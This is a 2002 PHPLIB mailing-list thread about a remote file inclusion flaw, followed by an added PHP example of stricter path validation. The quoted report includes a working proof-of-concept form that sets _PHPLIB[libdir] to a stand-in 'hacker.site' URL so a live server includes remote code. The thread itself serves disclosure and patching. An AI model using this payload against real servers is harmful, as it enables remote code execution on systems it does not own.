RE: [Phplib-users] security hole !!!Remote code execution !!!
From: Matt F. <ma...@sp...> - 2002-03-02 17:18:47
I just simply removed that code from my implementation of phplib - I never have a need to include files from another server. I'd be surprised if many apps would use this anyway.

Or you could do:

if( isset($_GET['_PHPLIB']) ) die("some message");

-----Original Message-----
From: php...@li... [mailto:php...@li...] On Behalf Of Marcin Pyla
Sent: Saturday March 2, 2002 11:51 AM
To: php...@li...
Subject: Re: [Phplib-users] security hole !!!Remote code execution !!!

Hello,

add a check of $_PHPLIB["libdir"] before include($_PHPLIB["libdir"] . "table.inc"); if $_PHPLIB["libdir"] contains the string http:// then stop - exit;

It will probably be something like this:

if (preg_match('/^http:\/\//', $_PHPLIB["libdir"])) {
    echo "Wrong \$_PHPLIB[\"libdir\"].";
    exit;
}
include($_PHPLIB["libdir"] . "table.inc");

> 
> files:
> /pages/new_user_alt.php3
> /pages/view_sessions.php3
> /pages/showoff.php3
> 
> line:
> include($_PHPLIB["libdir"] . "table.inc");
> 
> example:
> 
> <form method=POST action="http://phplib.sourceforge.net/showroom/view_sessions.php3">
> <input type=hidden name="_PHPLIB[libdir]" value="http://hacker.site/some_path/">
> <input type=submit>
> 
> versions tested: <7.4-pr1
> 
> tested, (and works) on
> http://phplib.sourceforge.net/

Yes, I tried it and it works.

-- 
Regards,
Marcin Pyla

(o_  [ <@ Marcin Pyla - Cubbi <cu...@se...> | <<+ NetArt ISP +>> @> ]
(/)_ [ It has been discovered that C++ has an uncanny ability to hide ]
     [ irrelevant details in programs, such as bugs. ]

_______________________________________________
Phplib-users mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phplib-users
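The regex proposed in the thread only catches a leading "http://"; PHP's include() also honours other stream wrappers (ftp://, https://, php://, data:), and with register_globals on the request can set $_PHPLIB["libdir"] directly. The following is an added example, not PHPLIB code, showing the two-part fix a defender would apply: set libdir from server-side configuration only, and validate any configured path against an allowed base directory before the include. PHPLIB_BASE and phplib_safe_libdir() are assumed names.

```php
<?php
// Added example (not part of PHPLIB). PHPLIB_BASE is an assumed install path.
define('PHPLIB_BASE', '/usr/local/lib/phplib');

/**
 * Return an absolute directory path under PHPLIB_BASE (with trailing slash),
 * or null if the candidate is unsafe. Rejects any "scheme:" prefix, i.e. every
 * stream wrapper and not only http://, and rejects ".." escapes from the base.
 */
function phplib_safe_libdir($candidate)
{
    if (!is_string($candidate) || $candidate === '') {
        return null;
    }
    // A URL scheme (http:, ftp:, php:, data:, ...) means remote/pseudo-file inclusion.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;
    }
    // realpath() collapses "..", symlinks and double slashes; false if it does not exist.
    $real = realpath(PHPLIB_BASE . '/' . $candidate);
    $base = realpath(PHPLIB_BASE);
    if ($real === false || $base === false) {
        return null;
    }
    // Must be the base directory itself or a subdirectory of it.
    if ($real !== $base && strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real . '/';
}

// Part 1: never let request data decide libdir. Assign it unconditionally
// after any register_globals / extract() processing, so a POSTed
// _PHPLIB[libdir] field is simply overwritten.
$_PHPLIB = array();
$_PHPLIB['libdir'] = PHPLIB_BASE . '/';

// Part 2: defence in depth for code that still reads a subdirectory from
// configuration. The payload from the report is rejected before include().
var_dump(phplib_safe_libdir('http://hacker.site/some_path/')); // NULL
var_dump(phplib_safe_libdir('php://input'));                  // NULL
var_dump(phplib_safe_libdir('../../../etc/'));                // NULL

$libdir = phplib_safe_libdir('.');   // "." = the base directory itself
if ($libdir === null) {
    die('Invalid PHPLIB libdir');
}
include($libdir . 'table.inc');
```

The three var_dump() calls print NULL regardless of the filesystem; the final include only runs when PHPLIB_BASE exists and resolves inside itself.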